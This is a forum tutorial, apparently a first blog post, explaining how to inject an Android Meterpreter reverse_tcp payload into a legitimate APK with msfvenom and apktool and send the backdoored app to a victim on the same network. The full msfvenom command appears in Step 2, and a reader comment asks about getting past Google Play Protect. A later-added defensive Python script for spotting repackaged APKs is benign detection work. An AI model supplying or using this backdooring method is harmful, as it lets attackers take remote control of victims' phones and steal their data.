Hi, I am Sanaan. Today I will be showing you how to bind an original APK into a payload with msfvenom. So let's get started.
Step 1: Install the Requirements
First we need to download Apktool and the APK into which we are going to inject the payload.
To download Apktool, go to this link: bitbucket.org/iBotPeaches/apktool/downloads/
Download the latest version of Apktool and rename it to apktool.jar. Now we need to download the Linux wrapper script; if you're on another OS, please download its wrapper script instead.
I am using Kali, so here is the Linux wrapper script: raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool Save it as apktool. Move apktool.jar and apktool to
/usr/local/bin
/usr/local/sbin
/usr/bin/
/usr/sbin/
After that, type apktool in the terminal to verify that it's working. If you see this at the top:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
then you have to type these commands whenever you are using apktool:
_SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS"
unset _JAVA_OPTIONS
alias java='java "$_SILENT_JAVA_OPTIONS"'
Remember to save this in your notepad. You have to copy and paste it into the terminal.
And now install the APK file of your choice.
Step 2: Let's Try It
Type:
msfvenom -x yourapkfilename.apk -p android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=4444 -o /root/Desktop/yourbackdooredapkfilename.apk
And our backdoored APK is created.
Step 3: Send It to Your Victim Who Is in the Same Network
Finally, send it to your victim, who is on the same network as you.
Hope you like my post. This is my very first post, and I will be doing a part 2, which uses the same concept but with ngrok. If you have any problems, please let me know. Bye.
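A defender's check, added here as an example and not part of the original post: an APK is a ZIP archive, so a file that has had anything bound into it can be told apart from the publisher's copy of the same version by hashing each entry. The function names and the two sample archives are constructed for illustration.

```python
import hashlib
import io
import zipfile

def entry_digests(apk_bytes):
    """Map each ZIP entry in an APK to the SHA-256 of its uncompressed data."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {i.filename: hashlib.sha256(zf.read(i)).hexdigest()
                for i in zf.infolist() if not i.is_dir()}

def diff_apk(reference, candidate):
    """Compare a candidate APK against the publisher's copy of the same version."""
    ref, cand = entry_digests(reference), entry_digests(candidate)
    return {
        "added": sorted(set(cand) - set(ref)),
        "removed": sorted(set(ref) - set(cand)),
        "changed": sorted(n for n in ref.keys() & cand.keys() if ref[n] != cand[n]),
    }

def is_repackaged(report):
    """True if code, manifest or signature entries differ from the reference."""
    watched = ("classes", "AndroidManifest.xml", "META-INF/")
    touched = report["added"] + report["removed"] + report["changed"]
    return any(name.startswith(watched) for name in touched)

def _make_apk(entries):
    # Helper that builds an in-memory ZIP so the example runs offline.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed sample data: entry contents are stand-ins, not real APK files.
ORIGINAL = _make_apk({
    "AndroidManifest.xml": b"<manifest perms='INTERNET'/>",
    "classes.dex": b"dex-original",
    "res/icon.png": b"png",
    "META-INF/CERT.RSA": b"publisher-cert",
})
MODIFIED = _make_apk({
    "AndroidManifest.xml": b"<manifest perms='INTERNET,READ_SMS'/>",
    "classes.dex": b"dex-original-plus-extra",
    "res/icon.png": b"png",
    "META-INF/CERT.RSA": b"other-cert",
})

if __name__ == "__main__":
    report = diff_apk(ORIGINAL, MODIFIED)
    print(report, "repackaged:", is_repackaged(report))
```

The comparison is only meaningful against the same version from the publisher, since a legitimate update also changes the code and manifest entries.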
2 Responses
Anyone got anything new on Google Play Protect for apk payload?
It still shows "Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true" while starting apktool. How do I fix this?